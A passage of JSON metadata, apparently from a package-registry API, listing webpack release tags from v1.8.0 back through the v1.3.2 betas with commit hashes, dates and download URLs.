1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","s